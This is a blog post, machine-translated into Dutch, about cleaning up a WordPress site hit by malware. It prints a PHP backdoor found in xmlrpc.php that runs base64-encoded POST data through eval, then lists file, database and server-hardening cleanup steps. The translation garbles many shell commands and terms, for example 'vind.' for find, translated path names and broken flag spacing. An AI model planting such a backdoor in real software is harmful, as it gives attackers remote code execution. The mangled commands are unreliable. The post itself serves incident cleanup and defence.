Voordat je dit bericht leest, ziet u post hier, Om iets te begrijpen. :)
Ik vond het in verschillende blogbestanden op stealthsettings.com, codes die lijken op de onderstaande codes die zijn verschenen als gevolg van het virus met de prestatie van WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
In het bovenstaande geval is ongeveer file xmlrpc.php van SlaperigMaar bij een grep server, kunt u zien dat er heel wat van zijn soort in de broncode.
Geïnfecteerde bestanden opschonen:
Ooookkkk ...
1. De beste oplossing, nadat het gedaan backupCPC en gereinigd database is om verwijderen bestanden WordPress (u kunt wp-config.php en bestanden die niet strikt gerelateerd zijn aan het wp-platform, nadat ze zorgvuldig zijn gecontroleerd) van de server houden en de originele bestanden van de versie uploaden 2.5.1 (Bij deze gelegenheid maakt een upgradeversie wp :)) http://wordpress.org/download/ . verwijderen van bestanden met inbegrip van thema, als je het vertrouwen dat je ze goed kunt controleren hebben.
Het is duidelijk dat de bestanden werden getroffen en de thema's die nog nooit zijn gebruikt op de blog en eenvoudig wijzigen van het thema, dit probleem niet oplossen.
./andreea/wp-content/thema's/default/index.php:
2. Zoek en verwijder alle bestanden met: * _new.php, _old.php * * .jpgg, .giff * * .pngg en bestand wp-info.txt, indien van toepassing.
vind. -naam "* _new.php"
vind. -naam "* _old.php"
vind. -naam "* .jpgg"
vind. -naam "* _giff"
vind. -naam "* _pngg"
vind. -naam "wp-info.txt"
3. in / tmp , Zoek en mappen zoals verwijderen tmpYwbzT2
schoonmaak SQL :
1. in tabel Tabel wp_options zien of er wordt verwijdert de lijnen: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Alles in wp_options, ga naar active_plugins en verwijderen als er een plugin die eindigt in een van de extensies * _new.php, * _old.php, *. jpgg, *. giff, *. pngg of als een ander toestel wordt vermoed, kijk goed.
3. In Tabel wp_usersZie als er een gebruiker die niets heeft geschreven in zijn rechter, de kolom user_nicename. Verwijder deze gebruiker, maar onthoud het nummer in de ID-kolom. Deze gebruiker gebruikt waarschijnlijk "WordPress"Ca" USER_LOGIN en lijkt te zijn gemaakt op 00: 00: 00 0000-00-00.
4. Ga naar de tabel wp_usermeta en verwijder alle lijnen behoren ID hierboven.
Nadat u deze SQL-opschoning heeft uitgevoerd, schakelt u elke plug-in uit en activeert u deze. (in blog -> Dashboard -> Plug-ins)
Beveiligde server:
1. Zie welke mappen en bestanden zijn "beschrijfbaar'(chmod 777) en probeer een chmod waardoor ze op geen enkel niveau meer kunnen schrijven. (chmod 644 bijvoorbeeld)
Zoeken. -Perm-2-ls
2. Zien welke bestanden het bit aan suid of sgid . Als u geen gebruik maken van de bestanden op hen chmod 0 of verwijderen van de verpakking die het bevat. Zijn zeer gevaarlijk, omdat ze uit te voeren privileges "groep"Of"wortel"En niet met normale gebruikersrechten om dat bestand uit te voeren.
find /-type f-perm-04000-ls
find /-type f-perm-02000-ls
3. Controleer welke poorten open staan en proberen te sluiten of te beveiligen die niet worden gebruikt.
netstat-an | grep-i listen
Over. Ik zie Sommige blogs zijn verboden de Google Search en anderen zeggen "Hij deed ze goed!!!" . Nou, ik zou het voor hen hebben gedaan ... maar wat zeg je als Google begint met verbieden alle sites vormen IS SPAM en zet Trojans (Trojan.Clicker.HTML) in koekjes?
1 dacht aan "WordPress Exploit – Opschonen van virusbestanden, SQL en serverbeveiliging.”